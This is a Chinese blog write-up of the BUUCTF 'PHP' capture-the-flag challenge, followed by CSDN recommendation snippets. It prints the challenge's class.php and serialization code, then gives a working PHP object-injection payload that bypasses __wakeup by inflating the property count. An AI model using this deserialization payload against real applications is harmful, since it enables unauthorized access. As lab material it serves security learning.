BUUCTF[极客大挑战 2019]PHP——wp

最新推荐文章于 2023-04-20 17:46:50 发布
最新推荐文章于 2023-04-20 17:46:50 发布
阅读量153 收藏
点赞数
分类专栏: 做题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzw1134864657/article/details/112200496
版权

通过目录扫描发现有www.zip
访问/www.zip
直接下载安装包
在这里插入图片描述
先看一下index.php里的PHP的相关内容
在这里插入图片描述

关键点在select,这是一个可控的变量
再看一下class.php

<?php
include 'flag.php';


error_reporting(0);
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

利用了两个变量username,password ,构造函写入了username,password
wakeup是在反序列化的时候自动执行的一个函数,会将username改为guest
flag输出的条件是username=admin,password=100
构造这样一个对象

<?php
class Name
{
	private $uesrname = 'admin';
	private $password = '100';
}
$user = new Name();
$str = serialize($user);
//$str = urlencode(serialize($user));
var_dump($str);
?>

运行结果:string(77) "O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}"


把参数改成3个,只要不对应,wakeup函数就会被绕过
第一个属性名长度是14,但却只能看见12个字符,所以,就是因为 \0 空白符丢失不可见
在属性名和类名中添加%00。传入变量select,成功得到flag。
?select=O:4:“Name”:3:{s:14:"%00Name%00username";s:5:“admin”;s:14:"%00Name%00password";i:100;}

在这里插入图片描述

参考:https://www.cnblogs.com/junlebao/p/13799762.html

石桥下
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
BUUCTF [极客挑战 2019] PHP
Senimo
07-30 982
BUUCTF [极客挑战 2019] PHP Web writeup 启动靶机,打开页面: 提示为备份,尝试使用脚本扫描备份文件: Python备份文件扫描脚本参考本篇文章 判断应该存在备份文件:www.zip 下载得到源码,打开其中的flag.php,得到flag: ...
BUUCTF--[极客挑战 2019]PHP
qq_46263951的博客
09-04 272
学了几天的PHP反序列化漏洞,找一个比较简单的题练练手 进入后给出提示网站存在备份,尝试几种常见的备份目录或者也可以直接扫描目录 访问/www.zip时弹出下载框,得到源代码,flag.php文件只有被调用执行才可获得到flag 在index.php中发现这样一段代码 <?php include 'class.php'; $select = $_GET['select']; //可控参数 $res=unserialize(@$select); //反序列化 ?> ...
BUUCTF】[极客挑战 2019]PHP
aoao331198的博客
04-06 926
打开网站提示说有备份文件 dirsearch扫描 下载www.zip查看 重要文件class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this-&
极客挑战php,BUUCTF-[极客挑战 2019]PHP 1
weixin_33423874的博客
03-22 338
打开题目,我们就看到这个猫,先是用鼠标晃了晃,还跟着我的光标摇脑袋。我是来做题的。前端工程师肯定也对这个下功夫了。有一个良好的备份网站的习惯很好啊,我们首先根据题目的提示,用dirsearch扫目录如果没有这个工具的可以去github上下载就可以了。最终,我们扫到这个备份文件www.zip这个备份文件于是,我们直接回到网页,然后拼接www.zip于是我们就下载了源码,解压之后,我们看到了这些打开f...
BUUCTF-Web】 [极客挑战 2019]PHP
RexHa的博客
09-04 706
BUUCTF-Web】 [极客挑战 2019]PHP
第三届ApacheFlink极客挑战赛暨AAIGCUP——电商推荐“抱大腿”攻击识别亚军代码方案.zip
10-23
第三届ApacheFlink极客挑战赛暨AAIGCUP——电商推荐“抱大腿”攻击识别亚军代码方案.zip
第三届 Apache Flink 极客挑战赛暨AAIG CUP——电商推荐“抱大腿”攻击识别亚军代码方案.zip
08-21
全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。...
竞赛资料源码-第三届 Apache Flink 极客挑战赛暨AAIG CUP——电商推荐“抱大腿”攻击识别亚军代码方案.zip
01-24
RoboMaster、RoboCon、“西门子杯”中国智能制造挑战赛、中国大学生计算机设计大赛、世界技能大赛、中国高校计算机大赛-大数据挑战赛、团体程序设计天梯赛、移动应用创新赛、网络技术挑战赛、全国大学生信息安全竞赛...
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典极客摇滚跑活动方案
BUUCTF-web [极客挑战 2019]PHP1
zzqzzq11的博客
08-06 850
buuctf
buuctf-web-[极客挑战 2019]PHP1
mlws1900的博客
09-22 524
因为成员(属性)是private,所以要在类名和成员名前加%00这个url编码是空的意思。在反序列化时,当前属性个数大于实际属性个数时,就会跳过__wakeup(),去执行__destruct。观察代码,发现需要username=admin,password=100才能获取flag。但是反序列化时会先运行__wakeup函数,对username赋值guest,需要绕过。打开环境,发现提示有备份文件,用dirsearch扫一遍,获得备份文件。index.php文件内容发现传参地址,对select进行传参。
BUUCTF之[极客挑战 2019]PHP ------ PHP的序列化/反序列化
weixin_44632787的博客
07-27 421
BUUCTF之[极客挑战 2019]PHP ------ PHP的序列化/反序列化 提示我们有备份网站,最终在www.zip下找到这个备份文件。将它下载下来,可以得到index.php,class.php和flag.php。 首先是flag.php,这里面虽然有flag。但是这个flag是假的。 <?php $flag = 'Syc{dog_dog_dog_dog}'; ?> 然后就是index.php,你打开它后会发现它是WEB界面的那个代码。 最后,想要拿到真正的flag。需要从cla
CTF-Web-[极客挑战 2019]PHP
归子莫的博客
05-03 2067
CTF-Web-[极客挑战 2019]PHP 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]PHP 打开题目的实例 思路 看到这种题目,我爱了 特别是这个动画效果...
BUUCTF Web [极客挑战 2019]PHP & [护网杯 2018]easy_tornado 1
网安小趴菜
09-05 435
BUUCTF Web [极客挑战 2019]PHP & [护网杯 2018]easy_tornado 1
BUUCTF-web PHP[极客挑战] wp
想喝奶茶的胖大海
02-26 1019
检查 有一只超级可爱的猫猫哦,可以跟你玩毛球球 然后提示说有备份,可以扫一下 思路 跟进得到压缩包,解压得到3个文件 在index.php得到关键代码 <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> 由unserialize(...
Buuctf-[极客挑战 2019]Upload
m0_63563528的博客
04-20 222
还是不行,出现上面这个提示,说明它还检测了我的文件头是不是jpg。一般我们可以用几何画板随便做一张图片,然后在图片中插入一句话木马,这里我为什么不用呢?因为图片中容易存在<?这个字段而被过滤掉。诶这里发现它还有检测,检查到我的内容有<?,又被拦截了,上网查了一下。
WX小程序源码小游戏类
05-28
WX小程序源码小游戏类提取方式是百度网盘分享地址
grpcio-1.47.2-cp310-cp310-musllinux_1_1_x86_64.whl
最新发布
05-28
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
buuctf 极客挑战2019php
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值